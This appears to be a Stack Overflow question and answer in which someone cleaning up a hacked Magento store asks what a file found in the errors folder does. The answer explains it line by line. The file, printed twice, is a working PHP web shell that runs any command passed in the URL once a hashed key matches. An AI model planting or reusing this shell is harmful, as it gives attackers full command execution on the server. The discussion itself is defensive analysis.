# Can anyone explain this script?

Tags: php, magento

I'm trying to recover a hacked Magento store, and found a file named **magento.php** in the **errors** folder within the Magento root directory. I know it's malicious but I can't really figure out what it's doing. Any ideas?

```
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {
    echo "<pre>";
    $cmd = ($_GET['cmd']);
    $ret = system($cmd);
    print $ret;
    echo "</pre>";
    die;
} else {
   print "-1";
}
?>
```

Comment: Please do not vandalise your post; this question was posted by your account, you yourself are responsible for how your account is used.

Comment: Fair enough, however I was able to delete things in the past despite having an upvote or two as long as it wasn't accepted. I just found that odd. No big deal though.

Comment: No, *questions* were never deletable once there is an answer with upvotes, or there is more than one answer. Perhaps you were thinking of answers?

Comment: Perhaps, my memory is a bit foggy as I haven't been very active on SO lately, but being that you are a mod I'm sure it's answers I'm referring to, yes. Thanks for the prompt responses.

Comment: See the *When can't I delete my own post?* section of the [central FAQ on deletion](https://meta.stackexchange.com/q/5221) for the details.

Answer (score 2):

It is simple php functionality which accessing parameters from the url and trying to execute the same.

```
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {// check the hash parameter in the url and convert it to md5 standard. If that matches the value then execute steps inside this braces
    echo "<pre>"; // print "<pre> tag on screen
    $cmd = ($_GET['cmd']); // get the cmd parameter from url
    $ret = system($cmd); // execute that cmd parameter as command
    print $ret; // print the return value of the system function
    echo "</pre>"; // print "</pre> tag on screen
    die; // stop execution at this line
} else { // if hash do not match
   print "-1"; // print -1 on screen
}
?>
```